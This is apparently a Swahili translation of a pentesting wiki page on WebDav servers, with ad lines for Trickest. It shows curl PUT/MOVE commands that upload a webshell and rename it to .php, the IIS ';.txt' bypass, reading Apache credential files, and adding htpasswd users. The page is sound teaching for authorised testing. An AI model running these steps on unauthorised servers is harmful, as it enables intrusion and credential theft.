WebDav

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zinazotumiwa na zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo:

Wakati wa kushughulika na HTTP Server yenye WebDav iliyoanzishwa, inawezekana kudhibiti faili ikiwa una vithibitisho sahihi, ambavyo kawaida vinathibitishwa kupitia HTTP Basic Authentication. Kupata udhibiti wa seva kama hiyo mara nyingi kunahusisha kupakia na kutekeleza webshell.

Ufikiaji wa seva ya WebDav kawaida unahitaji vithibitisho halali, huku WebDav bruteforce ikiwa njia ya kawaida ya kuzipata.

Ili kushinda vizuizi kwenye upakiaji wa faili, hasa vile vinavyokataza utekelezaji wa skripti za upande wa seva, unaweza:

• Pakia faili zenye nyongeza zinazoweza kutekelezwa moja kwa moja ikiwa hazijakatazwa.

• Badilisha jina la faili zisizoweza kutekelezwa zilizopakiwa (kama .txt) kuwa nyongeza inayoweza kutekelezwa.

• Nakili faili zisizoweza kutekelezwa zilizopakiwa, ukibadilisha nyongeza yao kuwa ile inayoweza kutekelezwa.

DavTest

Davtest inajaribu kupakia faili kadhaa zenye nyongeza tofauti na kuangalia ikiwa nyongeza hiyo inatekelezwa:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Hii haimaanishi kwamba .txt na .html extensions zinatekelezwa. Hii inamaanisha kwamba unaweza kufikia hizi faili kupitia mtandao.

Cadaver

Unaweza kutumia chombo hiki kuunganisha na WebDav server na kufanya vitendo (kama kupakia, kuhamasisha au kufuta) kwa mikono.

cadaver <IP>

Ombi la PUT

curl -T 'shell.txt' 'http://$ip'

Ombi la MOVE

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zinazotolewa na zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo:

IIS5/6 WebDav Uthibitisho

Uthibitisho huu ni wa kuvutia sana. WebDav hauruhusu kupakia au kurekebisha faili zenye kiambishi .asp. Lakini unaweza kuzidi hii kwa kuongeza mwishoni mwa jina ";.txt" na faili itatekelezwa kana kwamba ilikuwa faili ya .asp (unaweza pia kutumia ".html" badala ya ".txt" lakini USISAHAU ";").

Kisha unaweza kupakia shell yako kama faili ya ".txt" na kunakili/kuhamasisha kwenye faili ya ".asp;.txt". Ukifungua faili hiyo kupitia seva ya wavuti, itatekelezwa (cadaver itasema kwamba hatua ya kuhamasisha haikufanya kazi, lakini ilifanya).

Baada ya akidi

Ikiwa Webdav ilikuwa ikitumia seva ya Apache unapaswa kuangalia tovuti zilizowekwa kwenye Apache. Kawaida: /etc/apache2/sites-enabled/000-default

Ndani yake unaweza kupata kitu kama:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Kama unavyoona kuna faili zenye credentials halali za webdav server:

/etc/apache2/users.password

Ndani ya aina hii ya faili utapata jina la mtumiaji na hash ya nenosiri. Hizi ndizo sifa zinazotumiwa na seva ya webdav kuthibitisha watumiaji.

Unaweza kujaribu kufungua hizo, au kuongeza zaidi ikiwa kwa sababu fulani unataka kufikia seva ya webdav:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Ili kuangalia kama akiba mpya inafanya kazi unaweza kufanya:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

References

• https://vk9-sec.com/exploiting-webdav/

Tumia Trickest kujenga na kuandaa kazi kwa urahisi kwa kutumia zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo: